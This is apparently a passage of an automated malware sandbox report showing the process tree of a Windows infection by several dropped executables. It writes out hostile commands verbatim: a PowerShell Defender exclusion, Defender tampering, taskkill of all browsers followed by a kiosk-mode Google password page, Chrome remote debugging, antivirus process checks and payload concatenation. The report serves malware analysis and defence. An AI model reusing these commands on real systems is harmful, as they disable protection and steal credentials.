- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:4528
-
-
C:\Users\Admin\AppData\Local\Temp\10126070101\b55bf75f19.exe"C:\Users\Admin\AppData\Local\Temp\10126070101\b55bf75f19.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2940 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"5⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:4728
-
-
-
C:\Users\Admin\AppData\Local\Temp\10126080101\88521d4338.exe"C:\Users\Admin\AppData\Local\Temp\10126080101\88521d4338.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4816 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"5⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:2952
-
-
-
C:\Users\Admin\AppData\Local\Temp\10126090101\5eb3d17bf3.exe"C:\Users\Admin\AppData\Local\Temp\10126090101\5eb3d17bf3.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3664
-
-
C:\Users\Admin\AppData\Local\Temp\10126100101\8096f0397d.exe"C:\Users\Admin\AppData\Local\Temp\10126100101\8096f0397d.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3212 -
C:\Users\Admin\AppData\Local\Temp\10126100101\8096f0397d.exe"C:\Users\Admin\AppData\Local\Temp\10126100101\8096f0397d.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2512 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2512 -s 10166⤵
- Program crash
PID:3880
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 5085⤵
- Program crash
PID:3396
-
-
-
C:\Users\Admin\AppData\Local\Temp\10126110101\9fd60dd4c9.exe"C:\Users\Admin\AppData\Local\Temp\10126110101\9fd60dd4c9.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies system certificate store
PID:980
-
-
C:\Users\Admin\AppData\Local\Temp\10126120101\d0a561e64d.exe"C:\Users\Admin\AppData\Local\Temp\10126120101\d0a561e64d.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1836
-
-
C:\Users\Admin\AppData\Local\Temp\10126130101\59249c90a1.exe"C:\Users\Admin\AppData\Local\Temp\10126130101\59249c90a1.exe"4⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1932 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:804
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3340
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2692
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3124
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3172
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking5⤵PID:1824
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking6⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4088 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4088.0.357059854\1991833616" -parentBuildID 20221007134813 -prefsHandle 1220 -prefMapHandle 1152 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3dca0327-48cc-459b-b569-0be7331ef98a} 4088 "\\.\pipe\gecko-crash-server-pipe.4088" 1336 105d8358 gpu7⤵PID:4200
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4088.1.1481906287\1229019623" -parentBuildID 20221007134813 -prefsHandle 1504 -prefMapHandle 1500 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {99e6971a-13a4-4e5f-9b0a-f3073df42f07} 4088 "\\.\pipe\gecko-crash-server-pipe.4088" 1516 97ea258 socket7⤵PID:4416
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4088.2.1384221351\334992120" -childID 1 -isForBrowser -prefsHandle 1992 -prefMapHandle 1988 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4cf926b7-6991-4318-809e-cc2cb7ac0dc6} 4088 "\\.\pipe\gecko-crash-server-pipe.4088" 2028 1873a858 tab7⤵PID:4492
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4088.3.1519036423\1761198013" -childID 2 -isForBrowser -prefsHandle 2724 -prefMapHandle 2720 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {96df5098-97e3-4ee6-a0b9-e2dcb76ba2cc} 4088 "\\.\pipe\gecko-crash-server-pipe.4088" 2736 1d027358 tab7⤵PID:5076
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4088.4.1407940715\1352511227" -childID 3 -isForBrowser -prefsHandle 3892 -prefMapHandle 3420 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {85fa8489-fa96-4ce7-877b-273eb9af91b8} 4088 "\\.\pipe\gecko-crash-server-pipe.4088" 3904 20226758 tab7⤵PID:920
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4088.5.42864341\1546597698" -childID 4 -isForBrowser -prefsHandle 4012 -prefMapHandle 4016 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6364c4af-b688-471d-8977-a16a1b752dfa} 4088 "\\.\pipe\gecko-crash-server-pipe.4088" 4000 20468d58 tab7⤵PID:3048
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4088.6.705746386\1441910674" -childID 5 -isForBrowser -prefsHandle 4156 -prefMapHandle 4160 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cbcaf844-4d66-4958-bc38-aa12c9361abb} 4088 "\\.\pipe\gecko-crash-server-pipe.4088" 4144 20386158 tab7⤵PID:2524
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10126140101\220a009b82.exe"C:\Users\Admin\AppData\Local\Temp\10126140101\220a009b82.exe"4⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4024
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10126151121\skf7iF4.cmd"4⤵
- System Location Discovery: System Language Discovery
PID:4728 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\10126151121\skf7iF4.cmd' -ArgumentList 'sgcCUaUFtA' -WindowStyle Hidden -Verb RunAs"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4384 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10126151121\skf7iF4.cmd" sgcCUaUFtA6⤵
- System Location Discovery: System Language Discovery
PID:3220 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe "if ((Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty Model | findstr /i 'WDS100T2B0A') -and (-not (Get-ChildItem -Path F:\ -Recurse | Where-Object { -not $_.PSIsContainer } | Measure-Object).Count)) {exit 900} else {exit 1}"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1912 -
C:\Windows\SysWOW64\findstr.exe"C:\Windows\system32\findstr.exe" /i WDS100T2B0A8⤵PID:3796
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10126160101\PQkVDtx.exe"C:\Users\Admin\AppData\Local\Temp\10126160101\PQkVDtx.exe"4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Enumerates system info in registry
PID:4960 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files\runtime'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3168
-
-
-
C:\Users\Admin\AppData\Local\Temp\10126170101\packed.exe"C:\Users\Admin\AppData\Local\Temp\10126170101\packed.exe"4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Enumerates system info in registry
PID:1456 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files\runtime'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2672
-
-
-
C:\Users\Admin\AppData\Local\Temp\10126180101\bncn6rv.exe"C:\Users\Admin\AppData\Local\Temp\10126180101\bncn6rv.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
PID:2084 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""5⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2476 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef4a09758,0x7fef4a09768,0x7fef4a097786⤵PID:1544
-
-
C:\Windows\system32\ctfmon.exectfmon.exe6⤵PID:4688
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1124 --field-trial-handle=1288,i,16268207114436381126,17244322909721555080,131072 /prefetch:26⤵PID:3436
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1492 --field-trial-handle=1288,i,16268207114436381126,17244322909721555080,131072 /prefetch:86⤵PID:4464
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1588 --field-trial-handle=1288,i,16268207114436381126,17244322909721555080,131072 /prefetch:86⤵PID:3364
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2264 --field-trial-handle=1288,i,16268207114436381126,17244322909721555080,131072 /prefetch:16⤵
- Uses browser remote debugging
PID:3360
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2688 --field-trial-handle=1288,i,16268207114436381126,17244322909721555080,131072 /prefetch:16⤵
- Uses browser remote debugging
PID:2520
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2748 --field-trial-handle=1288,i,16268207114436381126,17244322909721555080,131072 /prefetch:16⤵
- Uses browser remote debugging
PID:2504
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1388 --field-trial-handle=1288,i,16268207114436381126,17244322909721555080,131072 /prefetch:26⤵PID:3972
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""5⤵
- Uses browser remote debugging
PID:2396 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef4a09758,0x7fef4a09768,0x7fef4a097786⤵PID:3800
-
-
C:\Windows\system32\ctfmon.exectfmon.exe6⤵PID:5036
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1156 --field-trial-handle=1148,i,11568277234877414219,16941578627147122700,131072 /prefetch:26⤵PID:4028
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1428 --field-trial-handle=1148,i,11568277234877414219,16941578627147122700,131072 /prefetch:86⤵PID:3440
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1500 --field-trial-handle=1148,i,11568277234877414219,16941578627147122700,131072 /prefetch:86⤵PID:3268
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2312 --field-trial-handle=1148,i,11568277234877414219,16941578627147122700,131072 /prefetch:16⤵
- Uses browser remote debugging
PID:852
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2128 --field-trial-handle=1148,i,11568277234877414219,16941578627147122700,131072 /prefetch:16⤵
- Uses browser remote debugging
PID:4052
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2688 --field-trial-handle=1148,i,11568277234877414219,16941578627147122700,131072 /prefetch:16⤵
- Uses browser remote debugging
PID:3220
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=3552 --field-trial-handle=1148,i,11568277234877414219,16941578627147122700,131072 /prefetch:26⤵PID:3168
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""5⤵
- Uses browser remote debugging
PID:4272 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef47f9758,0x7fef47f9768,0x7fef47f97786⤵PID:2020
-
-
C:\Windows\system32\ctfmon.exectfmon.exe6⤵PID:3816
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1124 --field-trial-handle=1380,i,2849560426630712752,10633023000094566786,131072 /prefetch:26⤵PID:2428
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1512 --field-trial-handle=1380,i,2849560426630712752,10633023000094566786,131072 /prefetch:86⤵PID:2292
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1588 --field-trial-handle=1380,i,2849560426630712752,10633023000094566786,131072 /prefetch:86⤵PID:1984
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2420 --field-trial-handle=1380,i,2849560426630712752,10633023000094566786,131072 /prefetch:16⤵
- Uses browser remote debugging
PID:2988
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2676 --field-trial-handle=1380,i,2849560426630712752,10633023000094566786,131072 /prefetch:16⤵
- Uses browser remote debugging
PID:2584
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2684 --field-trial-handle=1380,i,2849560426630712752,10633023000094566786,131072 /prefetch:16⤵
- Uses browser remote debugging
PID:752
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1188 --field-trial-handle=1380,i,2849560426630712752,10633023000094566786,131072 /prefetch:26⤵PID:1824
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10126190101\mAtJWNv.exe"C:\Users\Admin\AppData\Local\Temp\10126190101\mAtJWNv.exe"4⤵PID:4484
-
C:\Users\Admin\AppData\Local\Temp\10126190101\mAtJWNv.exe"C:\Users\Admin\AppData\Local\Temp\10126190101\mAtJWNv.exe"5⤵PID:3428
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4484 -s 4125⤵
- Program crash
PID:3732
-
-
-
C:\Users\Admin\AppData\Local\Temp\10126200101\HmngBpR.exe"C:\Users\Admin\AppData\Local\Temp\10126200101\HmngBpR.exe"4⤵PID:5096
-
C:\Users\Admin\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeC:\Users\Admin\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe5⤵PID:3200
-
C:\Users\Admin\AppData\Roaming\Dockerprotectysd\SplashWin.exeC:\Users\Admin\AppData\Roaming\Dockerprotectysd\SplashWin.exe6⤵PID:4132
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe7⤵PID:3600
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe8⤵PID:3848
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10126210101\FvbuInU.exe"C:\Users\Admin\AppData\Local\Temp\10126210101\FvbuInU.exe"4⤵PID:3972
-
-
C:\Users\Admin\AppData\Local\Temp\10126220101\ADFoyxP.exe"C:\Users\Admin\AppData\Local\Temp\10126220101\ADFoyxP.exe"4⤵PID:5240
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat5⤵PID:5424
-
C:\Windows\SysWOW64\expand.exeexpand Go.pub Go.pub.bat6⤵PID:5448
-
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
PID:5472
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"6⤵PID:5480
-
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
PID:5508
-
-
C:\Windows\SysWOW64\findstr.exefindstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"6⤵PID:5516
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 3530906⤵PID:5544
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Really.pub6⤵PID:5552
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.com6⤵PID:5692
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Maintains.pub + ..\Legislation.pub + ..\Blood.pub + ..\Document.pub + ..\Breaks.pub + ..\Both.pub + ..\Explicitly.pub + ..\Governor.pub + ..\Bull.pub + ..\Comparison.pub + ..\Performing.pub + ..\Gate.pub + ..\Republican.pub + ..\Reverse.pub + ..\Thousand.pub + ..\Apartments.pub + ..\Swingers.pub + ..\Urban.pub + ..\Robert.pub + ..\Regulation.pub + ..\Confusion.pub + ..\Listening.pub + ..\Generating.pub + ..\Argentina.pub + ..\Amenities.pub + ..\Vacation.pub + ..\Vampire.pub + ..\Trademarks.pub + ..\Distinguished.pub + ..\Silly.pub + ..\Hell.pub + ..\Worcester.pub + ..\Concept.pub + ..\Enlarge.pub + ..\Preference.pub + ..\Poem.pub m6⤵PID:5704
-
-
C:\Users\Admin\AppData\Local\Temp\353090\Seat.comSeat.com m6⤵PID:5716
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 56⤵PID:5724
-
-
-
-
